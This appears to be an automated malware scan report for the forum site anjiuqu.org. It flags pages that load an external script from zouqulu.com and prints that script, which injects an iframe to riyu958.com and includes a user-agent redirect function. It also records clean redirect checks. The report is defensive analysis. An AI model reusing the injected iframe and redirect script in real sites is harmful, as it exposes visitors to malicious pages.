Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=anjiuqu.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.anjiuqu.org/ | 200 OK Content-Length: 46154 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.zouqulu.com ...[1302 bytes skipped]... '/', showusercard = '1', attackevasive = '0', disallowfloat = 'newthread', creditnotice = '1|å¨æ|,2|éé±|,3|è´¡ç®|', defaultstyle = '', REPORTURL = 'aHR0cDovL3d3dy5hbmppdXF1Lm9yZy9pbmRleC5waHA=', SITEURL = 'http://www.anjiuqu.org/', JSPATH = 'static/js/', CSSPATH = 'data/cache/style_', DYNAMICURL = '';</script> <script src="static/js/common.js?Cl2" type="text/javascript"></script> <script src="http://www.zouqulu.com/bbs.js" type="text/javascript" type="text/javascript"></script> <meta name="application-name" content="91pron free videosãé¦é¡µã" /> <meta name="msapplication-tooltip" content="91pron free videosãé¦é¡µã" /> <meta name="msapplication-task" content="name=论å;action-uri=http://www.anjiuqu.org/forum.php;icon-uri=http://www.anjiuqu.org/static/image/common/bbs.ico" /> <link rel="archives" title="91pron free vip; <img src="stat ...[2662 bytes skipped]... | ||
http://www.anjiuqu.org/static/js/common.js?Cl2 | 200 OK Content-Length: 63412 Content-Type: application/x-javascript | clean |
http://www.zouqulu.com/bbs.js | 200 OK Content-Length: 1115 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: www.riyu958.com document.writeln("<iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='100%' height='2450' allowTransparency src=http://www.riyu958.com/></iframe>");
function browserRedirect() { var sUserAgent = navigator.userAgent.toLowerCase(); var bIsIpad = sUserAgent.match(/ipad/i) == "ipad"; var bIsIphoneOs = sUserAgent.match(/iphone os/i) == "iphone os"; var bIsMidp = sUserAgent.match(/midp/i) == "midp"; var bIsUc7 = sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4"; ...[527 bytes skipped]... Decoded script: <iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='100%' height='2450' allowTransparency src=http://www.riyu958.com/></iframe> Malicious iFrame found. size: 100x2450 src: http://www.riyu958.com/ This URL is marked by Google as suspicious <iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='100%' height='2450' allowtransparency src=http://www.riyu958.com/> | ||
http://www.anjiuqu.org/static/js/forum.js?Cl2 | 200 OK Content-Length: 22844 Content-Type: application/x-javascript | clean |
http://www.anjiuqu.org/static/js/logging.js?Cl2 | 200 OK Content-Length: 603 Content-Type: application/x-javascript | clean |
http://js.users.51.la/17358146.js | 200 OK Content-Length: 1964 Content-Type: application/x-javascript | clean |
http://www.anjiuqu.org/home.php?mod=misc&ac=sendmail&rand=1422092363 | 200 OK Content-Length: 0 Content-Type: text/javascript | clean |
http://discuz.gtimg.cn/cloud/scripts/discuz_tips.js?v=1 | 200 OK Content-Length: 6173 Content-Type: application/x-javascript | clean |
http://www.anjiuqu.org/member.php?mod=register | 200 OK Content-Length: 9436 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.zouqulu.com ...[1212 bytes skipped]... '1', attackevasive = '0', disallowfloat = 'newthread', creditnotice = '1|å¨æ|,2|éé±|,3|è´¡ç®|', defaultstyle = '', REPORTURL = 'aHR0cDovL3d3dy5hbmppdXF1Lm9yZy9tZW1iZXIucGhwP21vZD1yZWdpc3Rlcg==', SITEURL = 'http://www.anjiuqu.org/', JSPATH = 'static/js/', CSSPATH = 'data/cache/style_', DYNAMICURL = '';</script> <script src="static/js/common.js?Cl2" type="text/javascript"></script> <script src="http://www.zouqulu.com/bbs.js" type="text/javascript" type="text/javascript"></script> <meta name="application-name" content="91pron free videosãé¦é¡µã" /> <meta name="msapplication-tooltip" content="91pron free videosãé¦é¡µã" /> <meta name="msapplication-task" content="name=论å;action-uri=http://www.anjiuqu.org/forum.php;icon-uri=http://www.anjiuqu.org/static/image/common/bbs.ico" /> <link rel="stylesheet" id="css_widthauto" type="text/css" href ...[2746 bytes skipped]... | ||
http://www.anjiuqu.org/home.php?mod=misc&ac=sendmail&rand=1422092374 | 200 OK Content-Length: 0 Content-Type: text/javascript | clean |
http://www.anjiuqu.org/./ | 200 OK Content-Length: 46154 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.zouqulu.com ...[1302 bytes skipped]... '/', showusercard = '1', attackevasive = '0', disallowfloat = 'newthread', creditnotice = '1|å¨æ|,2|éé±|,3|è´¡ç®|', defaultstyle = '', REPORTURL = 'aHR0cDovL3d3dy5hbmppdXF1Lm9yZy9pbmRleC5waHA=', SITEURL = 'http://www.anjiuqu.org/', JSPATH = 'static/js/', CSSPATH = 'data/cache/style_', DYNAMICURL = '';</script> <script src="static/js/common.js?Cl2" type="text/javascript"></script> <script src="http://www.zouqulu.com/bbs.js" type="text/javascript" type="text/javascript"></script> <meta name="application-name" content="91pron free videosãé¦é¡µã" /> <meta name="msapplication-tooltip" content="91pron free videosãé¦é¡µã" /> <meta name="msapplication-task" content="name=论å;action-uri=http://www.anjiuqu.org/forum.php;icon-uri=http://www.anjiuqu.org/static/image/common/bbs.ico" /> <link rel="archives" title="91pron free vip; <img src="stat ...[2662 bytes skipped]... | ||
http://www.anjiuqu.org/./static/js/common.js?Cl2 | 200 OK Content-Length: 63412 Content-Type: application/x-javascript | clean |
http://www.anjiuqu.org/./static/js/forum.js?Cl2 | 200 OK Content-Length: 22844 Content-Type: application/x-javascript | clean |
http://www.anjiuqu.org/./static/js/logging.js?Cl2 | 200 OK Content-Length: 603 Content-Type: application/x-javascript | clean |
http://www.anjiuqu.org/./home.php?mod=misc&ac=sendmail&rand=1422092376 | 200 OK Content-Length: 0 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: anjiuqu.org
Result:
GET / HTTP/1.1
Host: anjiuqu.org
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: anjiuqu.org
Referer: http://www.google.com/search?q=anjiuqu.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: anjiuqu.org
Referer: http://www.google.com/search?q=anjiuqu.org
Result:
The result is similar to the first query. There are no suspicious redirects found.